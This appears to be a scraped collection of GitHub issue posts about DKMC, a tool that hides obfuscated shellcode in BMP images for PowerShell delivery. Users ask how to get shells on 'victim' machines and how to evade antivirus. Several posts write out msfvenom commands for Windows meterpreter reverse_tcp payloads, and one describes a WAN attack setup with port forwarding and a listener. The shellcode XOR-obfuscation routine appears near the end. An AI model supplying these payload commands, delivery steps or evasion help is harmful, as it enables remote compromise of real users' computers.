mr-un1k0d3r / dkmc Goto Github PK

Hi
Can i send the image for victim then open then the shell code execute, or execute powershell code in the victim device ?

Out of curiosity, i am trying to reproduce this using putty but having shell error when inserting into .bmp

does it only works with meterpreter payload?

This is really a good project. I tried to load the BMP file remotely with the C language code you provided,
https://github.com/Mr-Un1k0d3r/DKMC/blob/master/core/util/downloadshellcodebin.c
but I couldn't run shellcode. Can you provide SC- loader.exe I want to transform the source file of shellcode into a remote loading file. Thank you very much.

Tried a bunch of payloads. Still does not report...

When using very large shellcode it becomes near impossible to copy and paste. If possible could you add an -output option for the shellcode and an import option for the gen bmp. Thank you

first thanks for this great job , i'm generating shellcode using msfvenom like this:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=6667 -b '\x41\x41' -f hex

but i have no meterpreter session.. is my shellcode wrong or what!! .

(base) root@Rafey:~/ppk/DKMC-master# python dkmc.py
File "dkmc.py", line 47
print ""
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print("")?

(shellcode)>>> run
[-] >>> /root/Desktop/dkmc not found

Hi
I want to know how to listen for reverse shell when using DKMC.
Meterpreter for window ?

as my title "Embed the obfuscated shellcode for .apk (android)?" I am a newbie and still on my learning. Please answer me. Can we embed android application files .apk into obfuscated shellcode?

hi man ,thanks for this update but i'm still not getting a meterpreter session:
first i generate a raw shellcode with msfvenom like that:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=6667 -t raw -o /root/Desktop/shellcode.bin

after that i've used your tool to get the right format of shellcode.
can you help me or put a small demo please ...thanks

hey buddy ! can you help me with pointers to evade av . it was fine for last year . tis year most of the avs are picking up thanks

First of all thank you for this amazing script.

The issue I get is when using the shell code generated from msfvenom for android platform. Be it any payload DKMC is not accepting it..

Please help..

Hey man,

thanks for the creation of the tool. Any possibility to add an option to generate a binary as an output to execute more easily since PowerShell is getting picked up now by the most environments.

cant i get a session with the image file alone?

Hello. Was hoping to get some feedback on this- trying to run an attack over WAN:

Attacker:
VB 4.17.0-kali1-amd64 with latest meta apt upgrade.

*msfvenom -p windows/meterpreter/reverse_tcp LHOST=public ip LPORT=4444 -f raw > raw.txt
(build bmp, etc)

*web is running on port 8080

*NAT FWD: TCP on 8080 & 4444 to attacker LAN IP

*The PS batch file handshakes with web server and I see GET 202 etc. But no shell on attacker host.

*using multi/handler meterpreter/reverse_tcp LHOST 0.0.0.0 on 4444

*Running wireshark on target host I see the 8080 traffic but nothing on 4444. It ...appears... its downloading on 8080 but the shellcode just isnt running. No error(s).

Handler returns nothing. Any ideas?

blabla solved

first of all thank you very much for such this tool I followed all your steps correctly and the BMP picture being downloaded as I saw in the log of the web server built-in the tool but when I check my msf panel for any session it's not working I tried to use .txt generated payload, raw buffer files, and bash files so is there any specified syntax I should use during generating the payload so it can be worked after being converted to shellcode? thanks

(generate)>>> run Traceback (most recent call last): File "dkmc.py", line 43, in <module> mod.show_menu() File "C:\Users\lijx\Desktop\DKMC-master\module\module.py", line 21, in show_menu self.do_action() File "C:\Users\lijx\Desktop\DKMC-master\module\module.py", line 42, in do_action self.exec_action(data) File "C:\Users\lijx\Desktop\DKMC-master\module\module.py", line 57, in exec_action self.run_action() File "C:\Users\lijx\Desktop\DKMC-master\module\gen.py", line 30, in run_action data = self.get_file_data() File "C:\Users\lijx\Desktop\DKMC-master\module\gen.py", line 66, in get_file_data self.print_error("%s not found" % self.vars["source"][0]) AttributeError: GenModule instance has no attribute 'print_error'

no matter windows or Linux
both questions
how to solove?
thanks

Thank you very much for this excellent tool. I was wondering how I could run this locally, as in save the .BMP on my system and then run it without having to pull the .BMP from my server. Thanks in advance.

I tried on window 10 but not getting shell when i check on wireshark it show that when I execute powershell it send the get request and when BMP tried to execute my window send the reset.

root@nobody:/DKMC# python dkmc.py
Traceback (most recent call last):
File "dkmc.py", line 2, in
from core.ui import UI
ImportError: No module named core.ui
root@nobody:/DKMC#

Please explain how to insert shellcode into image?

Traceback (most recent call last):
File "dkmc.py", line 4, in
from module.gen import GenModule
File "/root/ppk/DKMC-master/module/gen.py", line 1, in
from module import ModuleObject
ImportError: cannot import name 'ModuleObject' from 'module' (/root/ppk/DKMC-master/module/init.py)

after running .bat file with ps script in it I didn't get any shell.

SEE AT github.com/GetRektBoy724/DKMCPRO

First of all, great tool! Really enjoy using this.

When the victim end device is using a proxy for outgoing traffic, the powershell payload to download the image fails:
Exception calling "DownloadData" with "1" argument(s): "The external server returned an error: (407) Proxy verification is needed."

Do you have any plans of implementing an option to make the powershell payload proxy-aware?
I really would really like to see this option in the PS payload generator, something like:

[System.Net.WebRequest]::DefaultWebProxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials

In order to use the users default proxy credentials. I'm not aware of a trigger that can set this option from a powershell one liner.

Hi guys, i'm try to installing dkmc.py with command "python dkmc.py" but i receipt this issue

hi, is the sample file is the clean BMP or that it's include the shellcode ?

File "dkmc.py", line 12
os.makedirs("output/")

with or without 'output' place.

python dkmc.py File "/home/username/DKMC/dkmc.py", line 47 print "" ^^^^^^^^ SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?

This is what i get when i do python dkmc.py

some time before i made it work.but now when i came back its not working anymore.I tryed to remove and git pull and clone a new one nothing worked.

def gen_shellcode(self, shellcode):
    shellcode = shellcode.replace("\r", "").replace("\n", "")
    try:
        key = self.gen_key()
        self.ui.print_msg("Generating obfuscation key 0x%s".join([f'\\x{b:02x}' for b in data]))
        #self.ui.print_msg("Generating obfuscation key 0x%s" % key.encode().hex())
        shellcode = self.pad_shellcode(shellcode)
        magic = self.gen_magic()
        self.ui.print_msg("Generating magic bytes %s" % hex(magic))
        shellcode = hex(magic)[2:10].decode("hex") + shellcode
        shellcode = self.xor_payload(shellcode, key)
        size = len(shellcode)
        shellcode = self.set_decoder(hex(magic)[2:10].decode("hex"), (size - 4)) + shellcode
        for i in range(1, 5):
            shellcode = shellcode.replace("[RAND" + str(i) + "]", self.gen_pop(hex(self.gen_magic())[2:10].decode("hex")))
        self.ui.print_msg("Final shellcode length is %s (%d) bytes" % (hex(len(shellcode)), len(shellcode)))
        if self.is_debug():
            print
        return shellcode
    except:
        self.ui.print_error("Something when wrong during the obfuscation. Wrong shellcode format?")
        return False

can you explain me this piece of code it's showing error again and again

no needed